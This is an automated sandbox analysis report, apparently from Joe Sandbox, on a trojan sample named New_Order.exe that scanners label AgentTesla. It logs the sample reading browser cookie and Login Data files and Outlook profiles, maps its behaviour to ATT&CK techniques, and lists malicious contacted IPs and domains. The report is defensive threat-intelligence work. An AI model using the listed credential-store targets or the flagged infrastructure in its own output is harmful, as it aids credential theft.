            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\wextract.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: C:\Windows\SysWOW64\wextract.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\wextract.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\wextract.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\wextract.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\wextract.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\wextract.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\wextract.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

            Remote Access Functionality

            Source: Yara match File source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: 412 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: 121 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Network Effects: Exploit SS7 to Redirect Phone Calls/SMS; SIM Card Swap
            Remote Service Effects: Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            [Behavior graph: ID 1352630, Sample: New_Order.exe, Startdate: 03/12/2023, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            New_Order.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
            New_Order.exe | 68% | Virustotal | | Browse
            New_Order.exe | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\QjSljS.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Roaming\QjSljS.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
            No Antivirus matches
                                                                                      high
                                                                                      https://www.transip.nl/vragen/110000572wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.jiyu-kobo.co.jp/New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://www.transip.eu/privacy-policy/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.fontbureau.com/designers8New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.transip.nl/knowledgebase/zoeken/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.transip.eu/terms-of-service/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | true
37.97.254.27 | wrautomotive.online | Netherlands | 20857 | TRANSIP-ASAmsterdamtheNetherlandsNL | true
109.68.33.25 | www.fdissolutions.net | United Kingdom | 20738 | GD-EMEA-DC-LD5GB | true
52.68.224.126 | busan3-200.com | United States | 16509 | AMAZON-02US | true
43.154.179.176 | www.waimaier2.store | Japan | 4249 | LILLY-ASUS | false
185.151.30.138 | www.quote2bill.com | United Kingdom | 48254 | TWENTYIGB | true
66.29.155.54 | www.pay4dance.xyz | United States | 19538 | ADVANTAGECOMUS | true
